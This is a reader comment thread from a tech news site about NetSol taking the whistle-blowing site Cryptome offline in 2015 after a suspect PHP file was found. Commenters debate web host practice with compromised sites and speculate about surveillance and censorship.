Re: It's back...
Welcome back John.
Whistle-blowing site Cryptome has been left temporarily unavailable after its service provider NetSol stopped routing traffic towards the site following the discovery of a suspect and probably malicious PHP file. Cryptome's John Young criticised NetSol's decision on to pull the plug on the whistle-blowing site as an …
This post has been deleted by its author
25 June 2015. Update:
Via Twitter @cryptomeorg:
NetSol rushed to reactivate Cryptome. No deal. Henceforth only SM will be used to exchange information. To hell with arrogant dirty ISPs.
Cryptome has been dispersed. Files will appear expectedly and unexpectedly at diverse locations online and off.
Besides pastes, drops, torrent, implants, hides, Cryptome has over a dozen sites for dispersed distribution, more coming. Got means-methods?
By sites and outlets is not meant only online, current leader of dirty work posing as clean.
It's a bit worrying knowing a site one's visited might be suss. But then I'm an infrequent visitor and the last time was several months ago.
Cryptome must take the cake for the plainest site on the Web but its articles are riveting. I find it endlessly fascinating. Once there, I can spend hours jumping from one government scandal to another. It's quite addictive really.
Nevertheless, when visiting Cryptome, I've always the nagging feeling that the NSA, GCHQ and DSD are logging my IP and every single article/PDF I flip through.
But perhaps I'm just paranoid.
NetworkSolutions is owned by web.com. We've put in a query to web.com inviting it to say when Cryptome.org is likely to be restored as well as inviting it to comment of Young's criticism of its actions. We'll update this story as and when we hear back from the internet service firm.
Don't you mean "if and when"?
/me is not holding my breath.
Shutting sites down because of a suspect file is a classic sign of a wanky webhost; and is a sign that you should change hosts immediately. It's perfectly possible to shut down a particular file or URL; and contact the owner of the site with a deadline for fixing it. Shutting a whole site down is a sign that the host is phoning it in.
Happened to me twice on 2 different hosts; and in one case they buggered off for a week (one external hack; one disgruntled subcontractor on a client's site). Of course shutting the site down often impedes the owner of the site from finding out what's wrong and fixing it as well.
Sure, I agree (in normal circumstances anyway).
But have you ever visited Cryptome? It mightn't take much of an excuse in Cryptome's case, as I'm sure it's high on the reading list of many government officials and often they won't like what they read (hence my earlier facetious comment re NSA et al).
I'm pretty sure that it wasn't censorship; purely because they were back within 48 hours. Sure the site's content is a probable motivating factor for the malware to be there in the first place (although it could just have well been an unfixed hole in the site picked up by an automatic scan for that vulnerability).
When malware is detected -especially email-spewing malware- things begin to happen...Search engines posting warnings; adding to blackhole lists and so on. This affects not only the site in question; but anyone on the same shared server; their hosts; the upstream providers of their hosts; the owners of that IP address parcel and so on. Action has to be taken and quickly...which action is taken sorts out the men from the boys, webhost-wise and NetSol's is kinda lazy but reasonable. They can (in order of wankiness, most to least):
1) Shut down the account and wait for the site's owner to come to them asking where their site went. This has happened to me. Needless to say, we were out of there that same day (and by the way, this is why you should ALWAYS keep your hosting and domains separate...having to extract the domains first would add considerable time to getting back in the game). Also shuts down any sites on that same account.
2) Shut the account down and message the owner explaining why. Also shuts down any sites on the same account.
3) Shut the domain down and contact the owner. This is not uncommon; but leaves the unfortunate catch-22 that the (remote) owner is unable to access anything and therefore can't see or solve the problem.
4) (As happened in Cryptome's case) Shut HTTP down and simultaneously message the owner.
5) Leave the site running; contact the owner; but move the site somewhere else where it's not going to interfere with other clients of the service. This takes time, and is more risky for the webhost. Give the owner a deadline to fix the problem.
In any of the above cases, the webhost may or may not tell the customer where the problem is.
The issue seems to be the 48-hour delay before the site was reinstated. Netsol is a big host and it could be due to something as simple as them switching to a new support system. Or a new policy. Or revenge if the guy has been a bit of a tosser in the past. Blaming everything on a conspiracy seems a little entitled to me.
Certainly if I had a site that was mission-critical or as guaranteed to piss people off as Cryptome; I'd have a plan B site waiting in the wings; then it's just a case of flicking the domains over...20 minutes tops until you're back on the air. If the domains (on a separate provider) get sanctioned then you can start moaning about conspiracies.
Yes, I'm sure you're correct about it not being censorship. Unlike Snowden, Cryptome is an annoying pimple rather than a gangrenous leg. If anything, it probably acts as a reliable, all-in-one-place updater for second/third-line public servants.
As the site is and has been accessible to US authorities for years, it's probably tolerated on the basis that weighing up the noise of closing it down/free-speechers etc. versus propagation of potential damage a la Snowden-level leaks, they've let things lie (it's what those in power are prepared to put up within a democracy). It seems to me that most of the stuff leaked was already available elsewhere.
Again, total supposition on my part, but I'd reckon it'd be a good assumption that John Young and Deborah Natsios have been spoken to in the past and they've a red line they will not cross. The stuff on the site is fascinating (I can read it for hours--it's more entertaining than whodunnits on TV) but, to me, it doesn't seem to be the stuff that'd bring out the Apaches and support crews.
Nevertheless, it's a warts-and-all, in-your-face, site that would annoy many and I'm sure it is monitored by the powers-that-be on a regular basis. Moreover, I'd reckon the site would regularly come under attack, even if not from government.
As a visitor to the site (albeit last time some months ago), I'd love to know what PHP code was suss--what does it do etc. After all, the site is designed not to be a script haven, plain as it is.
What NetSol and likes have been up to is anyone's guess (and a lot of what's happened is probably based on internal politics / perceptions etc.).
Again, any/all of those options you mention could come into play--even the duty IT staff may have played a 'political' hand given an opportunity, who knows. Perhaps Cryptome might be able to eventually leak that too.
What is wrong with taking the whole site down? How did that 1 file get on there to start with? Deleting that file should not be enough to get the site put back up as the hole that allowed it to get there in the first place is most likely still around. Taking the whole site down was sensible. Down vote away.
Since I host web sites for other people, more than once I have had to deactivate a website because they were compromised (generally because they used old versions of joomla or wordpress and didn't keep up with patches). If they didn't hire me to take care of their site, then I am not going to go into the site and muck around looking for what is there or how it got there. The ONLY action I can take is to give the site owner notice that there is a problem, explain what the problem is and how it was detected, and take the site offline to the public until it is fixed. If it is a dedicated server or virtual machine and spewing outbound traffic I just isolate the instance or box to its own vlan and give them instructions how how to vpn into the vlan to work it. Of course, I also offer "remediation services" at extra cost, but I'm not going to do it for free.
If the malware can't be removed immediately, of course the site must be pulled until it is removed. No chance of infecting people's computers can be tolerated. Some complaint about how long it took might have made sense, but this reaction just makes the guy look like a loose cannon.
And, of course, I suppose the NSA would love to infect the computers of the people who visit Cryptome...
i think it is BS.. i have never heard of a website taken down due to malcious content being detected on one of its webpages..
i have seen websites taken down by their owners, temporarily, due to malicious content being detected on one of their webpages, while the website was being cleaned up..
i doubt "web.com"/"netsol" would have many customers if they took down websites every time something malicious was detected on one of their webpages.. i am going to try to look to see if "web.com"/"netsol" has ever taken down any other website due to something malicious being detected on one of its webpages..
my guess is that someone with some clout reported the issue to "web.com"/"netsol" and they just had a "knee-jerk reaction" and took down the site without due diligence..
Biting the hand that feeds IT © 1998–2020